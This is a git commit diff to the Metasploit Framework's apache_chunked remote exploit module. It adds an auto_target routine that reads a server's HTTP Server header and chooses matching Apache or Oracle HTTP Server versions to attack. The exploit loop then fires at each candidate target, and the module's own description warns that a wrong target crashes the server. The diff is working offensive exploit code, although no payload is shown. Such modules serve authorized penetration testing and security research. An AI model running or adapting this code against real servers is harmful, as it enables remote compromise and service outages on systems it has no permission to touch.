add auto_target to apache_chunked exploit - should reduce run duration in most cases
git-svn-id: file:///home/svn/framework3/trunk@8980 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
776259e3c6
commit
eb003518ce
|
@ -9,10 +9,8 @@
|
||||||
# http://metasploit.com/framework/
|
# http://metasploit.com/framework/
|
||||||
##
|
##
|
||||||
|
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GoodRanking
|
Rank = GoodRanking
|
||||||
|
|
||||||
|
@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
automatically restart, so if you use the wrong target value,
|
automatically restart, so if you use the wrong target value,
|
||||||
the server will crash.
|
the server will crash.
|
||||||
},
|
},
|
||||||
'Author' => 'hdm',
|
'Author' => [ 'hdm', 'jduck' ],
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
@ -194,12 +192,82 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return code
|
return code
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def auto_target
|
||||||
|
response = send_request_raw({'uri' => '/'}, 5)
|
||||||
|
targets_to_try = []
|
||||||
|
|
||||||
|
if response.nil?
|
||||||
|
print_error("No response to request")
|
||||||
|
return targets_to_try
|
||||||
|
end
|
||||||
|
|
||||||
|
server_hdr = response['Server']
|
||||||
|
print_status("Server: #{server_hdr}")
|
||||||
|
|
||||||
|
case server_hdr
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
|
||||||
|
targets_to_try.push(targets[9])
|
||||||
|
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
|
||||||
|
targets_to_try.push(targets[10])
|
||||||
|
|
||||||
|
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
|
||||||
|
targets_to_try.push(targets[11])
|
||||||
|
|
||||||
|
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
|
||||||
|
# fall through
|
||||||
|
|
||||||
|
else
|
||||||
|
# check for apache version ranges
|
||||||
|
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
|
||||||
|
version = $1
|
||||||
|
|
||||||
|
#print_status("Apache version: #{version}")
|
||||||
|
ver = version.split('.')
|
||||||
|
if (ver.length == 3)
|
||||||
|
major = ver[0].to_i
|
||||||
|
minor = ver[1].to_i
|
||||||
|
rev = ver[2].to_i
|
||||||
|
if (major == 1 and minor == 3)
|
||||||
|
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
|
||||||
|
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[4]) if (rev == 22)
|
||||||
|
|
||||||
|
# Add the remaining targets, regardless of quality...
|
||||||
|
if (server_hdr =~ /Win32/)
|
||||||
|
# targets 4, 5, 6, 7
|
||||||
|
if (rev >= 17 and rev <= 24)
|
||||||
|
targets_to_try.push(targets[5])
|
||||||
|
targets_to_try.push(targets[6])
|
||||||
|
end
|
||||||
|
targets_to_try.push(targets[7])
|
||||||
|
targets_to_try.push(targets[8])
|
||||||
|
end
|
||||||
|
end
|
||||||
|
# Version 1.0 - 1.2, Fall through...
|
||||||
|
end
|
||||||
|
# ServerTokens setting isn't giving up enough information ... Might need to try?
|
||||||
|
end
|
||||||
|
# Not Apache? Fall through...
|
||||||
|
end
|
||||||
|
|
||||||
|
targets_to_try
|
||||||
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# If auto, ask the auto_target function for a list of
|
||||||
|
# targets to try...
|
||||||
|
#
|
||||||
|
# If not auto, just try the selected target.
|
||||||
|
#
|
||||||
def exploit
|
def exploit
|
||||||
if target_index == 0
|
if target_index == 0
|
||||||
targets.each_with_index { |targ, idx|
|
targs = auto_target
|
||||||
next if idx == 0
|
print_status("Auto-targeting returned #{targs.length} candidates...")
|
||||||
|
targs.each_with_index { |targ, idx|
|
||||||
|
# Never try the debug target automatically :)
|
||||||
next if targ.name =~ /Debug/
|
next if targ.name =~ /Debug/
|
||||||
|
|
||||||
exploit_target(targ)
|
exploit_target(targ)
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
|
@ -257,4 +325,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue